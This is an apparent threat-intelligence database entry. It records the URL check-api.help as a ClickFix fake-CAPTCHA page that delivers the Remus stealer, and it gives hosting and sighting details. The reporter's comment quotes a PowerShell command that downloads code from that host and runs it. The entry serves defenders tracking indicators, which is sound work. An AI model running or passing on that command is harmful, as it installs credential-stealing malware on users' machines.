ThreatFox IOC Database

You are viewing the ThreatFox database entry for url http://check-api.help/.

Database Entry

Add tag Delete this IOC  Report False Positive Export IOC (JSON)    Export IOC (CSV)
IOC ID:1825542
IOC: http://check-api.help/
IOC Type :url
Threat Type :payload_delivery
Malware: Remus
Confidence Level : Confidence level is high (100%)
Is compromised? : False
ASN:AS13335 CLOUDFLARENET
Country:- US
First seen:2026-06-09 16:39:50 UTC
Last seen:never
UUID:8fe11374-641b-11f1-a345-42010aa4000a
Reporter Anonymous
Reward 5 credits from ThreatFox
Tags:ClickFix

Avatar
Anonymous
ClearFake-style fake CAPTCHA / paste-and-run PowerShell chain. The page launches a hidden PowerShell process which executes: iex (iwr check-api.help -UseBasicParsing).Content. Joe Sandbox reports REMUS Stealer and marks http://check-api.help/ as malware/payload delivery.